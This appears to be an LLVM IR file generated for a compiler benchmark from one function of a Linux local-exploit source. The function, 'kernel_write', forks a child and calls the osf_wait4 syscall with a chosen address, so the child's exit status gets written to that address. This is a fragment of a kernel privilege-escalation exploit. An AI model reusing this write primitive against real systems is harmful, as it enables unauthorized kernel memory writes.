; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_17391.c_kernel_write.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_17391.c_kernel_write.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@SYS_osf_wait4 = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @kernel_write(i64 %0, i32 %1) #0 {
  %3 = alloca i64, align 8
  %4 = alloca i32, align 4
  %5 = alloca i32, align 4
  store i64 %0, i64* %3, align 8
  store i32 %1, i32* %4, align 4
  %6 = call i32 (...) @fork()
  store i32 %6, i32* %5, align 4
  %7 = load i32, i32* %5, align 4
  %8 = icmp ne i32 %7, 0
  br i1 %8, label %9, label %15

9:                                                ; preds = %2
  %10 = load i32, i32* @SYS_osf_wait4, align 4
  %11 = load i32, i32* %5, align 4
  %12 = load i64, i64* %3, align 8
  %13 = inttoptr i64 %12 to i32*
  %14 = call i32 @syscall(i32 %10, i32 %11, i32* %13, i32 0, i32 1)
  ret void

15:                                               ; preds = %2
  %16 = load i32, i32* %4, align 4
  %17 = call i32 @exit(i32 %16) #3
  unreachable
}

declare dso_local i32 @fork(...) #1

declare dso_local i32 @syscall(i32, i32, i32*, i32, i32) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
